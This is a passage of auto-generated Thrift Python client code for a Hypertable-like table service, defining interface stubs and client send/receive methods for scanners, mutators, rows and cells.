@param table_name - table name
@param row - row key
@return a list of cells (with row_keys unset)
Parameters:
- ns
- table_name
- row
"""
pass
def get_row_as_arrays(self, ns, name, row):
"""
Alternative interface using array as cell
Parameters:
- ns
- name
- row
"""
pass
def get_row_serialized(self, ns, table_name, row):
"""
Alternative interface returning buffer of serialized cells
Parameters:
- ns
- table_name
- row
"""
pass
def get_cell(self, ns, table_name, row, column):
"""
Get a cell (convenience method for random access a cell)
@param ns - namespace id
@param table_name - table name
@param row - row key
@param column - column name
@return value (byte sequence)
Parameters:
- ns
- table_name
- row
- column
"""
pass
def get_cells(self, ns, table_name, scan_spec):
"""
Get cells (convenience method for access small amount of cells)
@param ns - namespace id
@param table_name - table name
@param scan_spec - scan specification
@return a list of cells (a cell with no row key set is assumed to have
the same row key as the previous cell)
Parameters:
- ns
- table_name
- scan_spec
"""
pass
def get_cells_as_arrays(self, ns, name, scan_spec):
"""
Alternative interface using array as cell
Parameters:
- ns
- name
- scan_spec
"""
pass
def get_cells_serialized(self, ns, name, scan_spec):
"""
Alternative interface returning buffer of serialized cells
Parameters:
- ns
- name
- scan_spec
"""
pass
def refresh_shared_mutator(self, ns, table_name, mutate_spec):
"""
Create a shared mutator with specified MutateSpec.
Delete and recreate it if the mutator exists.
@param ns - namespace id
@param table_name - table name
@param mutate_spec - mutator specification
Parameters:
- ns
- table_name
- mutate_spec
"""
pass
def offer_cells(self, ns, table_name, mutate_spec, cells):
"""
Open a shared periodic mutator which causes cells to be written asyncronously.
Users beware: calling this method merely writes
cells to a local buffer and does not guarantee that the cells have been persisted.
If you want guaranteed durability, use the open_mutator+set_cells* interface instead.
@param ns - namespace id
@param table_name - table name
@param mutate_spec - mutator specification
@param cells - set of cells to be written
Parameters:
- ns
- table_name
- mutate_spec
- cells
"""
pass
def offer_cells_as_arrays(self, ns, table_name, mutate_spec, cells):
"""
Alternative to offer_cell interface using array as cell
Parameters:
- ns
- table_name
- mutate_spec
- cells
"""
pass
def offer_cell(self, ns, table_name, mutate_spec, cell):
"""
Open a shared periodic mutator which causes cells to be written asyncronously.
Users beware: calling this method merely writes
cells to a local buffer and does not guarantee that the cells have been persisted.
If you want guaranteed durability, use the open_mutator+set_cells* interface instead.
@param ns - namespace id
@param table_name - table name
@param mutate_spec - mutator specification
@param cell - cell to be written
Parameters:
- ns
- table_name
- mutate_spec
- cell
"""
pass
def offer_cell_as_array(self, ns, table_name, mutate_spec, cell):
"""
Alternative to offer_cell interface using array as cell
Parameters:
- ns
- table_name
- mutate_spec
- cell
"""
pass
def open_mutator(self, ns, table_name, flags, flush_interval):
"""
Open a table mutator
@param ns - namespace id
@param table_name - table name
@param flags - mutator flags
@param flush_interval - auto-flush interval in milliseconds; 0 disables it.
@return mutator id
Parameters:
- ns
- table_name
- flags
- flush_interval
"""
pass
def close_mutator(self, mutator, flush):
"""
Close a table mutator
@param mutator - mutator id to close
Parameters:
- mutator
- flush
"""
pass
def set_cell(self, mutator, cell):
"""
Set a cell in the table
@param mutator - mutator id
@param cell - the cell to set
Parameters:
- mutator
- cell
"""
pass
def set_cell_as_array(self, mutator, cell):
"""
Alternative interface using array as cell
Parameters:
- mutator
- cell
"""
pass
def set_cells(self, mutator, cells):
"""
Put a list of cells into a table
@param mutator - mutator id
@param cells - a list of cells (a cell with no row key set is assumed
to have the same row key as the previous cell)
Parameters:
- mutator
- cells
"""
pass
def set_cells_as_arrays(self, mutator, cells):
"""
Alternative interface using array as cell
Parameters:
- mutator
- cells
"""
pass
def set_cells_serialized(self, mutator, cells, flush):
"""
Alternative interface using buffer of serialized cells
Parameters:
- mutator
- cells
- flush
"""
pass
def flush_mutator(self, mutator):
"""
Flush mutator buffers
Parameters:
- mutator
"""
pass
def exists_namespace(self, ns):
"""
Check if the namespace exists
@param ns - namespace name
@return true if ns exists, false ow
Parameters:
- ns
"""
pass
def exists_table(self, ns, name):
"""
Check if the table exists
@param ns - namespace id
@param name - table name
@return true if table exists, false ow
Parameters:
- ns
- name
"""
pass
def get_table_id(self, ns, table_name):
"""
Get the id of a table
@param ns - namespace id
@param table_name - table name
@return table id string
Parameters:
- ns
- table_name
"""
pass
def get_schema_str(self, ns, table_name):
"""
Get the schema of a table as a string (that can be used with create_table)
@param ns - namespace id
@param table_name - table name
@return schema string (in xml)
Parameters:
- ns
- table_name
"""
pass
def get_schema(self, ns, table_name):
"""
Get the schema of a table as a string (that can be used with create_table)
@param ns - namespace id
@param table_name - table name
@return schema object describing a table
Parameters:
- ns
- table_name
"""
pass
def get_tables(self, ns):
"""
Get a list of table names in the namespace
@param ns - namespace id
@return a list of table names
Parameters:
- ns
"""
pass
def get_listing(self, ns):
"""
Get a list of namespaces and table names table names in the namespace
@param ns - namespace
@return a list of table names
Parameters:
- ns
"""
pass
def get_table_splits(self, ns, table_name):
"""
Get a list of table splits
@param ns - namespace id
@param table_name - table name
@return a list of table names
Parameters:
- ns
- table_name
"""
pass
def drop_namespace(self, ns, if_exists):
"""
Drop a namespace
@param ns - namespace name
@param if_exists - if true, don't barf if the table doesn't exist
Parameters:
- ns
- if_exists
"""
pass
def rename_table(self, ns, name, new_name):
"""
Rename a table
@param ns - namespace id
@param name - current table name
@param new_name - new table name
Parameters:
- ns
- name
- new_name
"""
pass
def drop_table(self, ns, name, if_exists):
"""
Drop a table
@param ns - namespace id
@param name - table name
@param if_exists - if true, don't barf if the table doesn't exist
Parameters:
- ns
- name
- if_exists
"""
pass
class Client(Iface):
"""
The client service mimics the C++ client API, with table, scanner and
mutator interface flattened.
"""
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot != None:
self._oprot = oprot
self._seqid = 0
def create_namespace(self, ns):
"""
Create a namespace
@param ns - namespace name
Parameters:
- ns
"""
self.send_create_namespace(ns)
self.recv_create_namespace()
def send_create_namespace(self, ns):
self._oprot.writeMessageBegin('create_namespace', TMessageType.CALL, self._seqid)
args = create_namespace_args()
args.ns = ns
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_create_namespace(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = create_namespace_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def create_table(self, ns, table_name, schema):
"""
Create a table
@param ns - namespace id
@param table_name - table name
@param schema - schema of the table (in xml)
Parameters:
- ns
- table_name
- schema
"""
self.send_create_table(ns, table_name, schema)
self.recv_create_table()
def send_create_table(self, ns, table_name, schema):
self._oprot.writeMessageBegin('create_table', TMessageType.CALL, self._seqid)
args = create_table_args()
args.ns = ns
args.table_name = table_name
args.schema = schema
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_create_table(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = create_table_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def open_namespace(self, ns):
"""
Open a namespace
@param ns - namespace
@return value is guaranteed to be non-zero and unique
Parameters:
- ns
"""
self.send_open_namespace(ns)
return self.recv_open_namespace()
def send_open_namespace(self, ns):
self._oprot.writeMessageBegin('open_namespace', TMessageType.CALL, self._seqid)
args = open_namespace_args()
args.ns = ns
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_open_namespace(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = open_namespace_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "open_namespace failed: unknown result");
def close_namespace(self, ns):
"""
Close a namespace
@param ns - namespace
Parameters:
- ns
"""
self.send_close_namespace(ns)
self.recv_close_namespace()
def send_close_namespace(self, ns):
self._oprot.writeMessageBegin('close_namespace', TMessageType.CALL, self._seqid)
args = close_namespace_args()
args.ns = ns
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_close_namespace(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = close_namespace_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def open_scanner(self, ns, table_name, scan_spec, retry_table_not_found):
"""
Open a table scanner
@param ns - namespace id
@param table_name - table name
@param scan_spec - scan specification
@param retry_table_not_found - whether to retry upon errors caused by
drop/create tables with the same name
Parameters:
- ns
- table_name
- scan_spec
- retry_table_not_found
"""
self.send_open_scanner(ns, table_name, scan_spec, retry_table_not_found)
return self.recv_open_scanner()
def send_open_scanner(self, ns, table_name, scan_spec, retry_table_not_found):
self._oprot.writeMessageBegin('open_scanner', TMessageType.CALL, self._seqid)
args = open_scanner_args()
args.ns = ns
args.table_name = table_name
args.scan_spec = scan_spec
args.retry_table_not_found = retry_table_not_found
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_open_scanner(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = open_scanner_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "open_scanner failed: unknown result");
def close_scanner(self, scanner):
"""
Close a table scanner
@param scanner - scanner id to close
Parameters:
- scanner
"""
self.send_close_scanner(scanner)
self.recv_close_scanner()
def send_close_scanner(self, scanner):
self._oprot.writeMessageBegin('close_scanner', TMessageType.CALL, self._seqid)
args = close_scanner_args()
args.scanner = scanner
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_close_scanner(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = close_scanner_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def next_cells(self, scanner):
"""
Iterate over cells of a scanner
@param scanner - scanner id
Parameters:
- scanner
"""
self.send_next_cells(scanner)
return self.recv_next_cells()
def send_next_cells(self, scanner):
self._oprot.writeMessageBegin('next_cells', TMessageType.CALL, self._seqid)
args = next_cells_args()
args.scanner = scanner
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_next_cells(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = next_cells_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "next_cells failed: unknown result");
def next_cells_as_arrays(self, scanner):
"""
Parameters:
- scanner
"""
self.send_next_cells_as_arrays(scanner)
return self.recv_next_cells_as_arrays()
def send_next_cells_as_arrays(self, scanner):
self._oprot.writeMessageBegin('next_cells_as_arrays', TMessageType.CALL, self._seqid)
args = next_cells_as_arrays_args()
args.scanner = scanner
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_next_cells_as_arrays(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = next_cells_as_arrays_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "next_cells_as_arrays failed: unknown result");
def next_cells_serialized(self, scanner):
"""
Alternative interface returning buffer of serialized cells
Parameters:
- scanner
"""
self.send_next_cells_serialized(scanner)
return self.recv_next_cells_serialized()
def send_next_cells_serialized(self, scanner):
self._oprot.writeMessageBegin('next_cells_serialized', TMessageType.CALL, self._seqid)
args = next_cells_serialized_args()
args.scanner = scanner
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_next_cells_serialized(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = next_cells_serialized_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "next_cells_serialized failed: unknown result");
def next_row(self, scanner):
"""
Iterate over rows of a scanner
@param scanner - scanner id
Parameters:
- scanner
"""
self.send_next_row(scanner)
return self.recv_next_row()
def send_next_row(self, scanner):
self._oprot.writeMessageBegin('next_row', TMessageType.CALL, self._seqid)
args = next_row_args()
args.scanner = scanner
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_next_row(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = next_row_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "next_row failed: unknown result");
def next_row_as_arrays(self, scanner):
"""
Alternative interface using array as cell
Parameters:
- scanner
"""
self.send_next_row_as_arrays(scanner)
return self.recv_next_row_as_arrays()
def send_next_row_as_arrays(self, scanner):
self._oprot.writeMessageBegin('next_row_as_arrays', TMessageType.CALL, self._seqid)
args = next_row_as_arrays_args()
args.scanner = scanner
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_next_row_as_arrays(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = next_row_as_arrays_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "next_row_as_arrays failed: unknown result");
def next_row_serialized(self, scanner):
"""
Alternate interface returning a buffer of serialized cells for iterating by row
for a given scanner
@param scanner - scanner id
Parameters:
- scanner
"""
self.send_next_row_serialized(scanner)
return self.recv_next_row_serialized()
def send_next_row_serialized(self, scanner):
self._oprot.writeMessageBegin('next_row_serialized', TMessageType.CALL, self._seqid)
args = next_row_serialized_args()
args.scanner = scanner
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_next_row_serialized(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = next_row_serialized_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "next_row_serialized failed: unknown result");
def get_row(self, ns, table_name, row):
"""
Get a row (convenience method for random access a row)
@param ns - namespace id
@param table_name - table name
@param row - row key
@return a list of cells (with row_keys unset)
Parameters:
- ns
- table_name
- row
"""
self.send_get_row(ns, table_name, row)
return self.recv_get_row()
def send_get_row(self, ns, table_name, row):
self._oprot.writeMessageBegin('get_row', TMessageType.CALL, self._seqid)
args = get_row_args()
args.ns = ns
args.table_name = table_name
args.row = row
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_row(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_row_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_row failed: unknown result");
def get_row_as_arrays(self, ns, name, row):
"""
Alternative interface using array as cell
Parameters:
- ns
- name
- row
"""
self.send_get_row_as_arrays(ns, name, row)
return self.recv_get_row_as_arrays()
def send_get_row_as_arrays(self, ns, name, row):
self._oprot.writeMessageBegin('get_row_as_arrays', TMessageType.CALL, self._seqid)
args = get_row_as_arrays_args()
args.ns = ns
args.name = name
args.row = row
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_row_as_arrays(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_row_as_arrays_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_row_as_arrays failed: unknown result");
def get_row_serialized(self, ns, table_name, row):
"""
Alternative interface returning buffer of serialized cells
Parameters:
- ns
- table_name
- row
"""
self.send_get_row_serialized(ns, table_name, row)
return self.recv_get_row_serialized()
def send_get_row_serialized(self, ns, table_name, row):
self._oprot.writeMessageBegin('get_row_serialized', TMessageType.CALL, self._seqid)
args = get_row_serialized_args()
args.ns = ns
args.table_name = table_name
args.row = row
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_row_serialized(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_row_serialized_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_row_serialized failed: unknown result");
def get_cell(self, ns, table_name, row, column):
"""
Get a cell (convenience method for random access a cell)
@param ns - namespace id
@param table_name - table name
@param row - row key
@param column - column name
@return value (byte sequence)
Parameters:
- ns
- table_name
- row
- column
"""
self.send_get_cell(ns, table_name, row, column)
return self.recv_get_cell()
def send_get_cell(self, ns, table_name, row, column):
self._oprot.writeMessageBegin('get_cell', TMessageType.CALL, self._seqid)
args = get_cell_args()
args.ns = ns
args.table_name = table_name
args.row = row
args.column = column
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_cell(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_cell_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_cell failed: unknown result");
def get_cells(self, ns, table_name, scan_spec):
"""
Get cells (convenience method for access small amount of cells)
@param ns - namespace id
@param table_name - table name
@param scan_spec - scan specification
@return a list of cells (a cell with no row key set is assumed to have
the same row key as the previous cell)
Parameters:
- ns
- table_name
- scan_spec
"""
self.send_get_cells(ns, table_name, scan_spec)
return self.recv_get_cells()
def send_get_cells(self, ns, table_name, scan_spec):
self._oprot.writeMessageBegin('get_cells', TMessageType.CALL, self._seqid)
args = get_cells_args()
args.ns = ns
args.table_name = table_name
args.scan_spec = scan_spec
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_cells(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_cells_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_cells failed: unknown result");
def get_cells_as_arrays(self, ns, name, scan_spec):
"""
Alternative interface using array as cell
Parameters:
- ns
- name
- scan_spec
"""
self.send_get_cells_as_arrays(ns, name, scan_spec)
return self.recv_get_cells_as_arrays()
def send_get_cells_as_arrays(self, ns, name, scan_spec):
self._oprot.writeMessageBegin('get_cells_as_arrays', TMessageType.CALL, self._seqid)
args = get_cells_as_arrays_args()
args.ns = ns
args.name = name
args.scan_spec = scan_spec
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_cells_as_arrays(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_cells_as_arrays_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_cells_as_arrays failed: unknown result");
def get_cells_serialized(self, ns, name, scan_spec):
"""
Alternative interface returning buffer of serialized cells
Parameters:
- ns
- name
- scan_spec
"""
self.send_get_cells_serialized(ns, name, scan_spec)
return self.recv_get_cells_serialized()
def send_get_cells_serialized(self, ns, name, scan_spec):
self._oprot.writeMessageBegin('get_cells_serialized', TMessageType.CALL, self._seqid)
args = get_cells_serialized_args()
args.ns = ns
args.name = name
args.scan_spec = scan_spec
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_cells_serialized(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_cells_serialized_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_cells_serialized failed: unknown result");
def refresh_shared_mutator(self, ns, table_name, mutate_spec):
"""
Create a shared mutator with specified MutateSpec.
Delete and recreate it if the mutator exists.
@param ns - namespace id
@param table_name - table name
@param mutate_spec - mutator specification
Parameters:
- ns
- table_name
- mutate_spec
"""
self.send_refresh_shared_mutator(ns, table_name, mutate_spec)
self.recv_refresh_shared_mutator()
def send_refresh_shared_mutator(self, ns, table_name, mutate_spec):
self._oprot.writeMessageBegin('refresh_shared_mutator', TMessageType.CALL, self._seqid)
args = refresh_shared_mutator_args()
args.ns = ns
args.table_name = table_name
args.mutate_spec = mutate_spec
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_refresh_shared_mutator(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = refresh_shared_mutator_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def offer_cells(self, ns, table_name, mutate_spec, cells):
"""
Open a shared periodic mutator which causes cells to be written asyncronously.
Users beware: calling this method merely writes
cells to a local buffer and does not guarantee that the cells have been persisted.
If you want guaranteed durability, use the open_mutator+set_cells* interface instead.
@param ns - namespace id
@param table_name - table name
@param mutate_spec - mutator specification
@param cells - set of cells to be written
Parameters:
- ns
- table_name
- mutate_spec
- cells
"""
self.send_offer_cells(ns, table_name, mutate_spec, cells)
self.recv_offer_cells()
def send_offer_cells(self, ns, table_name, mutate_spec, cells):
self._oprot.writeMessageBegin('offer_cells', TMessageType.CALL, self._seqid)
args = offer_cells_args()
args.ns = ns
args.table_name = table_name
args.mutate_spec = mutate_spec
args.cells = cells
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_offer_cells(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = offer_cells_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def offer_cells_as_arrays(self, ns, table_name, mutate_spec, cells):
"""
Alternative to offer_cell interface using array as cell
Parameters:
- ns
- table_name
- mutate_spec
- cells
"""
self.send_offer_cells_as_arrays(ns, table_name, mutate_spec, cells)
self.recv_offer_cells_as_arrays()
def send_offer_cells_as_arrays(self, ns, table_name, mutate_spec, cells):
self._oprot.writeMessageBegin('offer_cells_as_arrays', TMessageType.CALL, self._seqid)
args = offer_cells_as_arrays_args()
args.ns = ns
args.table_name = table_name
args.mutate_spec = mutate_spec
args.cells = cells
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_offer_cells_as_arrays(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = offer_cells_as_arrays_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def offer_cell(self, ns, table_name, mutate_spec, cell):
"""
Open a shared periodic mutator which causes cells to be written asyncronously.
Users beware: calling this method merely writes
cells to a local buffer and does not guarantee that the cells have been persisted.
If you want guaranteed durability, use the open_mutator+set_cells* interface instead.
@param ns - namespace id
@param table_name - table name
@param mutate_spec - mutator specification
@param cell - cell to be written
Parameters:
- ns
- table_name
- mutate_spec
- cell
"""
self.send_offer_cell(ns, table_name, mutate_spec, cell)
self.recv_offer_cell()
def send_offer_cell(self, ns, table_name, mutate_spec, cell):
self._oprot.writeMessageBegin('offer_cell', TMessageType.CALL, self._seqid)
args = offer_cell_args()
args.ns = ns
args.table_name = table_name
args.mutate_spec = mutate_spec
args.cell = cell
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_offer_cell(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = offer_cell_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def offer_cell_as_array(self, ns, table_name, mutate_spec, cell):
"""
Alternative to offer_cell interface using array as cell
Parameters:
- ns
- table_name
- mutate_spec
- cell
"""
self.send_offer_cell_as_array(ns, table_name, mutate_spec, cell)
self.recv_offer_cell_as_array()
def send_offer_cell_as_array(self, ns, table_name, mutate_spec, cell):
self._oprot.writeMessageBegin('offer_cell_as_array', TMessageType.CALL, self._seqid)
args = offer_cell_as_array_args()
args.ns = ns
args.table_name = table_name
args.mutate_spec = mutate_spec
args.cell = cell
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_offer_cell_as_array(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = offer_cell_as_array_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def open_mutator(self, ns, table_name, flags, flush_interval):
"""
Open a table mutator
@param ns - namespace id
@param table_name - table name
@param flags - mutator flags
@param flush_interval - auto-flush interval in milliseconds; 0 disables it.
@return mutator id
Parameters:
- ns
- table_name
- flags
- flush_interval
"""
self.send_open_mutator(ns, table_name, flags, flush_interval)
return self.recv_open_mutator()
def send_open_mutator(self, ns, table_name, flags, flush_interval):
self._oprot.writeMessageBegin('open_mutator', TMessageType.CALL, self._seqid)
args = open_mutator_args()
args.ns = ns
args.table_name = table_name
args.flags = flags
args.flush_interval = flush_interval
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_open_mutator(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = open_mutator_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "open_mutator failed: unknown result");
def close_mutator(self, mutator, flush):
"""
Close a table mutator
@param mutator - mutator id to close
Parameters:
- mutator
- flush
"""
self.send_close_mutator(mutator, flush)
self.recv_close_mutator()
def send_close_mutator(self, mutator, flush):
self._oprot.writeMessageBegin('close_mutator', TMessageType.CALL, self._seqid)
args = close_mutator_args()
args.mutator = mutator
args.flush = flush
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_close_mutator(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = close_mutator_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def set_cell(self, mutator, cell):
"""
Set a cell in the table
@param mutator - mutator id
@param cell - the cell to set
Parameters:
- mutator
- cell
"""
self.send_set_cell(mutator, cell)
self.recv_set_cell()
def send_set_cell(self, mutator, cell):
self._oprot.writeMessageBegin('set_cell', TMessageType.CALL, self._seqid)
args = set_cell_args()
args.mutator = mutator
args.cell = cell
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_set_cell(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = set_cell_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def set_cell_as_array(self, mutator, cell):
"""
